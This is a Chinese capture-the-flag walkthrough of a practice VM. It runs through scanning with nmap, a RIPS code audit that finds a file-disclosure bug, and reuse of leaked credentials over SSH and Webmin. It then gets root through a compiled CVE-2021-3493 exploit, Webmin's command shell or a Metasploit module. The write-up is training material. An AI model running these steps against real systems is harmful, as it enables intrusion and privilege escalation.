打靶总结-过程及思路系列16

alyssa

转载于：安全牛课堂
1.靶机目标
root权限+2个flag

2.工具准备
    rips：静态php代码审计系统
    官方网站：http://rips-scanner.sourceforge.net/
    rips替代产品：sonarsource
    官方网站：https://www.sonarsource.com/


CVE-2021-3493：https://github.com/briskets/CVE-2021-3493

3.详细步骤
一、主机发现

1. sudo arp-scan -l

复制代码

二、端口扫描

1. <div>sudo nmap -p- 10.0.0.17</div><div>sudo nmap -p22,80,10000 -sC -sV 10.0.0.17</div>

复制代码

Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。

三、Web信息收集
浏览器访问http://10.0.0.17/


浏览器访问http://10.0.0.17:10000/

点击链接访问https://ripper-min:10000/


通过简单尝试弱口令，并无法登录系统。
尝试访问robots.txt文件，https://ripper-min:10000/robots.txt，发现一串base64串

1. <div>User-agent: *</div><div>Disallow: /</div><div>d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==</div>

复制代码

通过搜索rips官方网站得知：rips安装完成后，会在网站目录存在一个rips目录


故浏览器访问https://ripper-min:10000/rips，没有变化


浏览器访问http://10.0.0.17/rips/，发现rips管理后台


四、rips代码审计
path/file处填写扫描目录为/var/www，点击scan按钮


扫描结果首页：

1. Vulnerability is also triggered in:
   
2. /var/www/html/rips/main.php
   
3. /var/www/html/rips/index.php
   
4. /var/www/html/rips/windows/help.php
   
5. /var/www/html/rips/windows/leakscan.php
   
6. /var/www/html/rips/windows/code.php
   
7. /var/www/html/rips/windows/function.php

复制代码

具体结果：


查看其中报告得知，代码中存在File Disclosure漏洞，可以读取文件内容，故随意使用/var/www/html/rips/windows/code.php文件进行验证测试，其中code.php的参数为file。


浏览器访问http://10.0.0.17/rips/windows/code.php，

浏览器访问http://10.0.0.17/rips/windows/co ... ../../../etc/passwd，尝试读网站根目录以外的操作系统文件，但不可行

浏览器访问http://10.0.0.17/rips/windows/co ... ps/windows/code.php，可以读取网站目录内的文件

但通过这些漏洞服务无法获取网站权限。故在rips中继续发现。
通过rips检索pass关键字发现了可疑的php文件


全部搜索结果

特殊结果：

显示全部代码，获取了一个用户名和密码：

1. ripper
   
2. Gamespeopleplay

复制代码

用该密码尝试登录Webmin后台https://10.0.0.17:10000/，但登录失败


用该密码再尝试登录靶机的ssh，登录成功

1. <div>ssh ripper@10.0.0.17</div><div>Gamespeopleplay</div><div>id</div>

复制代码

方法一：
五、主机信息收集

1. <div>uname -a</div><div>lsb_release -a</div>

复制代码

内核版本比较新，但Ubuntu 18.04.5 LTS可能存在CVE-2021-3493漏洞，故尝试使用


六、CVE-2021-3493 ROOT提权
Kali主机编译exp

1. <div>unzip CVE-2021-3493-main.zip</div><div>cd CVE-2021-3493-main</div><div>gcc -o exp exploit.c</div>

复制代码

上传靶机系统

1. <div>scp exp ripper@10.0.0.17:~/</div><div>Gamespeopleplay</div>

复制代码

执行利用脚本，root提权成功

1. ls
   
2. ./exp
   
3. id

复制代码

方法二：
五、主机信息收
返回ripper用户权限
flag1:

1. cd ~
   
2. cat flag.txt

复制代码

由于没有找到有用的提权信息，但系统又存在cubes用户。故查找宿主为cubes，且ripper用户可读的文件寻找线索。

1. <div><div>find / -user cubes -type f -exec ls -al {} \; 2>/dev/null</div><div>
   
2. </div><div>-rw-r--r-- 1 cubes cubes 807 Jun  4 11:28 /home/cubes/.profile</div><div>-rw-r--r-- 1 cubes cubes 3771 Jun  4 11:28 /home/cubes/.bashrc</div><div>-rw------- 1 cubes cubes 334 Jun  4 13:25 /home/cubes/.ICEauthority</div><div>-rw-r--r-- 1 cubes cubes 8980 Jun  4 11:28 /home/cubes/examples.desktop</div><div>-rw-r--r-- 1 cubes cubes 220 Jun  4 11:28 /home/cubes/.bash_logout</div><div>-rw------- 1 cubes cubes 384 Jun  4 11:48 /home/cubes/.bash_history</div><div>-rw-rw-r-- 1 cubes cubes 60 Jun  4 11:42 /mnt/secret.file</div></div><div></div>

复制代码

发现了一个可疑的文件，查看该文件

1. <div>cat /mnt/secret.file</div><div>This is my secret file</div><div>
   
2. </div><div>[file system]</div><div>-passwd : Il00tpeople</div>

复制代码

使用该密码尝试ssh登录靶机，cubes登录成功

1. ssh cubes@10.0.0.17
   
2. Il00tpeople
   
3. id

复制代码

再次查询cubes所属的文件，发现Webmin的日志文件

1. find / -user cubes -type f -exec ls -al {} \; 2>/dev/null | grep -v "proc" | grep -v ".png"

复制代码

故查看Webmin的日志文件，发现管理员登录日志

1. <div>cat /var/webmin/backup/miniser.log</div><div>
   
2. </div><div>username=admin&pass=tokiohotel</div>

复制代码

浏览器访问https://10.0.0.17:10000，使用刚刚获取的用户名和密码成功登录webmin系统




六、获取ROOT权限
通过浏览控制webmin面板Others，Command Shell，获取一个Webshell


发现该Shell就是root权限


flag2:

1. cat /root/flag.txt

复制代码

其他：Metasploit获取Root
通过搜索Exploit-DB发现针对Webmin 1.910还有个Metasploit远程代码执行代码

1. searchsploit webmin

复制代码

故启动Metasploit

1. msfconsole

复制代码

搜索webmin

1. search webmin

复制代码

设置攻击参数

1. <div>use 2</div><div>show options</div>

复制代码

执行攻击，获取root权限。/

1. <div>run</div><div>id</div>

复制代码